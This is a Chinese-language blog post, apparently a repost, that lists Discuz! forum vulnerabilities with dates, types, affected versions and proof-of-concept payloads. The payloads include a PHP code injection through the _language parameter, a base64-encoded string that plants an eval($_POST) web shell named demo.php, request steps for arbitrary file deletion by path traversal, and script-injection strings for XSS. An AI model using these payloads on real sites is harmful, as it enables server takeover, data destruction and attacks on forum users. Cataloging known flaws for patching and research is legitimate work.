zoukankan      html  css  js  c++  java
  • 应用安全

    Discuz ML! V3.X 代码注入

    Date
    2019
    
    类型
    代码注入导致RCE
    
    影响范围
    Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org

    poc
    _language=sc'.phpinfo().';

    SSV-90861

    Date:
    2012

    类型:
    敏感信息泄露

    影响范围:
    DZ x2.5 

    POC:
    http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php

    Discuz! X2.5 远程代码执行

    Date:
    2012
    
    类型:
    RCE
    
    前置条件:1).注册任意账户
    (2).登陆用户,发表blog日志(注意是日志)
    (3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
    (4).访问日志,论坛根目录下生成demo.php,一句发密码c
    
    影响范围:
    v2.5

    Discuz!X2/2.5弱口令破解漏洞

    Date:
    2013
    
    类型:
    登录界面暴力破解
    
    影响范围:
    Discuz!X2/2.5

    ssvid-93588

    Date:
    2014
    
    类型:
    任意文件删除

    前置条件:
    (1)登陆DZ前台
    (2)请求:
    home.php?mod=spacecp&ac=profile&op=base
    POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
    修改成功之后出生地就会变为../../../test.txt

    (3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)

    请求后文件被删除

    
    影响范围:
    version<=3.4

    SSV-96608

    Date:
    2014.10
    
    类型:
    前台任意文件删除
    
    影响范围:

     

    SSV-89024

    Date:
    2015.1
    
    类型:
    Discuz X2.5 /source/class/class_image.php 命令执行漏洞
    
    影响范围:
    Discuz X2.5 

    Discuz! X系列远程代码执行漏洞

    Date:
    2015.8
    
    类型:
    RCE + XML反序列化
    
    前置条件:
    访问:/api/uc.php
    影响范围:

     

    SSV-91183

    Date:
    2016.3
    
    类型:
    SSRF
    
    影响范围:
    Discuz! X2 X3

    POC:
    http://www.internetblog.cn/archives/6068.html?mip

     

    CVE-2018-14729

    Date:
    2018.8
    
    类型:
    远程代码执行
    
    前置条件:
    登录后台
    
    影响范围:
    Discuz! 1.5-2.5
    Discuz
    Discuz!X ≤3.4 任意文件删除漏洞分析
    
    Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
    SQL注入及跨站脚本漏洞。
    moodwall.inc.php
    发表心情处直接插入html代码
    code 区域
    "><script>alert(/xss/)</script>
    
    
    Discuz! X1某页面存在XSS漏洞
    简要描述:
    页面对取到的参数没有过滤,直接echo到了html里
    详细说明:
    api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
    漏洞证明:
    http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
  • 相关阅读:
    MPI消息传递MPI_Sendrecv的用法
    外网SSH访问内网LINUX服务器
    LINUX下Doxygen的配置与使用
    C语言中关键字const一般的用途
    Ubuntu使用apt-get时提示>”E: You must put some ‘source’ URIs in your sources.list”
    C语言中复数运算及调用blas,lapack中复数函数进行科学计算
    linux系统下C语言调用lapack ,blas库
    一封家书,道尽顶尖人才的思维境界
    学会用麦肯锡的方式思考
    记得自己的大梦想
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11739371.html
Copyright © 2011-2022 走看看